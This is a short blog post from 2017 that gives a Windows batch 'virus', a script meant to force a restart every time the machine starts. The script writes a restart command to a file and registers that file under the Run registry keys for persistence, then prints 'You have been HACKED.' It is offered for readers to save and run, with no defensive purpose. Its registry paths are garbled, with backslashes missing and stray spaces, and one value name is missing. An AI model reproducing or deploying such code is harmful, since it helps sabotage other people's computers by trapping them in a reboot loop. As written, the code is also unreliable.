Thursday, 30 March 2017

A Virus To Shut Down Computer Every Time It Is Turned On

  No comments

In this post you will know how you can make a virus using batch programming and that virus will everytime shut down computer when it is turned on.

Note:Please use this tricks on your risk.

echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v /t reg_sz /d c:windowshartlell.bat /f
echo You have been HACKED.
PAUSE
Note: Save this file with GangsOfCoder.bat (.bat must be extension and you can replace the name GangsOfcoder with your desired name).
Virus To ShutDown Computer

No comments :

Post a Comment

Loading...